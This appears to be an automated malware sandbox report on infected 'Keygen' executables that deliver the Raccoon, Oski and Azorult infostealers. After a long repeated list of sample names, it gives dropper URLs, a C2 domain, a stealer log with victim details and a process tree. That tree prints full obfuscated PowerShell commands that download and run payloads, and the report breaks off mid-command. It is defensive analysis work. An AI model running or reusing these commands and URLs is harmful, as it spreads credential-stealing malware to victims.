Overview

overview

10

Static

static

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...en.exe

windows7_x64

10

201001-nyh...en.exe

windows10_x64

10

Resubmissions

02-10-2020 21:14

201002-pjxdl9y6a6 10

01-10-2020 20:51

201001-e45lwcxsnn 10

01-10-2020 20:51

201001-fhxddb9gwe 10

01-10-2020 20:51

201001-ts8hns28ea 10

01-10-2020 20:51

201001-v1kt3kgljx 10

01-10-2020 20:51

201001-d2fbtjzv4s 10

01-10-2020 20:51

201001-cgj9prs442 10

01-10-2020 20:49

201001-t1jnpvwcgx 10

Analysis

  • max time kernel
    107s
  • max time network
    155s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    01-10-2020 20:51

General

  • Target

    201001-nyhbt4p25j_pw_infected/Keygen — копия (5) — копия.exe

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:02 2020 Launched at: 2020.10.02 - 02:41:00 GMT Bot_ID: 664A9041-4AC4-46F3-B3DC-87DB4D57890E_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 5 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.51 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: GOHCSFBB - Username: Admin - Windows version: NT 10.0 - Product name: Windows 10 Pro - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 4095 MB (866 MB used) - Screen resolution: 1280x720 - Display devices: 0) Microsoft Basic Display Adapter ============

Extracted

Family

oski

C2

nadia.ac.ug

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon log file 1 IoCs

    Detects a log file produced by the Raccoon Stealer.

  • ModiLoader First Stage 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 23 IoCs
  • Loads dropped DLL 14 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies registry class 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 16 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (5) — копия.exe
    "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (5) — копия.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1732
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3667.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ????? (5) — ?????.exe""
      2⤵
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:1172
      • C:\Users\Admin\AppData\Local\Temp\3667.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:1608
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\3667.tmp\m.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2120
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3056
          • C:\Users\Public\qwn.exe
            "C:\Users\Public\qwn.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:4808
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:4932
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:5040
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 5040 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\854539798099218\\* & exit
                  8⤵
                    PID:4196
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /pid 5040
                      9⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2680
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:4956
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:5092
              • C:\Users\Public\qwn.exe
                "C:\Users\Public\qwn.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops desktop.ini file(s)
                PID:5028
                • C:\Users\Admin\AppData\Local\Temp\oruH67uNPH.exe
                  "C:\Users\Admin\AppData\Local\Temp\oruH67uNPH.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:2484
                • C:\Users\Admin\AppData\Local\Temp\Kud9SronT5.exe
                  "C:\Users\Admin\AppData\Local\Temp\Kud9SronT5.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:4868
                • C:\Users\Admin\AppData\Local\Temp\gb8LphRkfv.exe
                  "C:\Users\Admin\AppData\Local\Temp\gb8LphRkfv.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of SetWindowsHookEx
                  PID:2188
                  • \??\c:\windows\SysWOW64\cmstp.exe
                    "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\mydae0hj.inf
                    8⤵
                      PID:860
                  • C:\Users\Admin\AppData\Local\Temp\FyoCC7SDb8.exe
                    "C:\Users\Admin\AppData\Local\Temp\FyoCC7SDb8.exe"
                    7⤵
                    • Executes dropped EXE
                    • Windows security modification
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4672
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "powershell" Get-MpPreference -verbose
                      8⤵
                        PID:2716
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\qwn.exe"
                      7⤵
                        PID:1588
                        • C:\Windows\SysWOW64\timeout.exe
                          timeout /T 10 /NOBREAK
                          8⤵
                          • Delays execution with timeout.exe
                          PID:5052
              • C:\Windows\SysWOW64\mshta.exe
                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\3667.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:2148
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                  4⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:692
              • C:\Windows\SysWOW64\timeout.exe
                timeout 1
                3⤵
                • Delays execution with timeout.exe
                PID:2432
              • C:\Windows\SysWOW64\mshta.exe
                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\3667.tmp\b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:208
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = 